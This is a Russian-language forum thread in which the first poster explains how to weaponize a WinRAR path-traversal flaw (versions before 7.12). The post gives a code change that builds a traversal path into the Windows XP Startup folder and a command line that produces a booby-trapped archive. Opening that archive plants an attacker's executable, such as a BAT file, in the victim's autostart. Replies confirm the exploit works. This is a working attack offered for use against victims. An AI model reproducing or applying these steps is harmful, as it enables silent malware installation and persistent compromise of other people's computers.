|
Moderation History | New Thread | Reply | Subscribe
|
|
doormimiz
Member since Feb 25, 2026
|
Привет Акопяны! Хочу показать, как эксплуатировать опасную уязвимость в Winrar версии 5.0 и выше, то есть под XP как минимум
Для начала, скачайте весь репозиторий отсюда и в файле main.py отыщите функцию build_startup_traversal_path, после чего замените в ней переменную traversal_path на это:
traversal_path = (
"..\\..\\..\\..\\..\\..\\..\\..\\..\\"
+ "DOCUME~1\\All Users\\STARTM~1\\Programs\\Startup\\"
+ payload_name
)
(или вы можете скачать уже заранее заготовленный вариант отсюда)
Все эти изменения нужны чтобы подготовить программу под реалии Windows XP.
Далее о том как это юзать:
python main.py --decoy <ФАЙЛ КОТОРЫЙ БУДЕТ В АРХИВЕ> --payload <ФАЙЛ КОТОРЫЙ БУДЕТ ПОМЕЩЕН В СТАРТАП ЖЕРТВЫ (ЖЕЛАТЕЛЬНО ИСПОЛНЯЕМЫЙ, НАПР. BAT)>
По итогу у вас в папке появляется зараженный архивчик, если даже просто открыть его (не распаковывать) Winrar версии до 7.12, то исполняемый файл будет помещен в автозапуск
Проверял лично под Winrar 6 и XP SP3 |
| Posted Apr 24, 2026, 02:18 PM |
Quote
|
j2a
Member since Jan 18, 2026
|
Очень неплохо, уязвимость рабочая |
| Posted Apr 24, 2026, 08:21 PM |
Quote
|
cloudpeople
Member since Apr 24, 2026
|
Это получается все UNRAR.Dll до 7.12-ой уязвимы? |
| Posted Apr 24, 2026, 08:38 PM |
Quote
|